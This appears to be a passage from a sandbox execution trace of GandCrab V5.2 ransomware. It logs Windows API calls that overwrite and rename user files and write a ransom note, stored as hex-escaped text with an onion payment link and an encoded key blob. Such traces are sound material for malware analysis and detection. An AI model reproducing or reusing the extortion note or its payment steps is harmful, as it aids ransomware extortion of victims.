SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.908] WriteFile (in: hFile=0x2b4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f1c0, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f1c0*=0x21c, lpOverlapped=0x0) returned 1 [0093.911] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.915] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.915] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.916] CloseHandle (hObject=0x2b4) returned 1 [0093.916] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\v2h uSr5.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\7vyfk2yzgvfdhogguhe\\v2h usr5.bmp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\7vyfk2YzGvFDhoGguhe\\v2h uSr5.bmp.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\7vyfk2yzgvfdhogguhe\\v2h usr5.bmp.titwmvjl"), dwFlags=0x1) returned 1 [0093.917] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.917] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 0 [0093.917] FindClose (in: hFindFile=0x503738 | out: hFindFile=0x503738) returned 1 [0093.918] CloseHandle (hObject=0x2ac) returned 1 [0093.918] FindNextFileW (in: hFindFile=0x5036f8, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0093.918] lstrcmpW (lpString1="Camera Roll", lpString2=".") returned 1 [0093.918] lstrcmpW (lpString1="Camera Roll", lpString2="..") returned 1 [0093.918] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\", lpString2="Camera Roll" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll" [0093.918] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\" [0093.918] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0093.918] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.919] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0093.919] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.919] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0093.919] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.919] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0093.919] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.919] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0093.919] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.920] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.920] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\\\TITWMVJL-DECRYPT.txt") returned 64 [0093.920] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\Camera Roll\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\camera roll\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0093.921] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x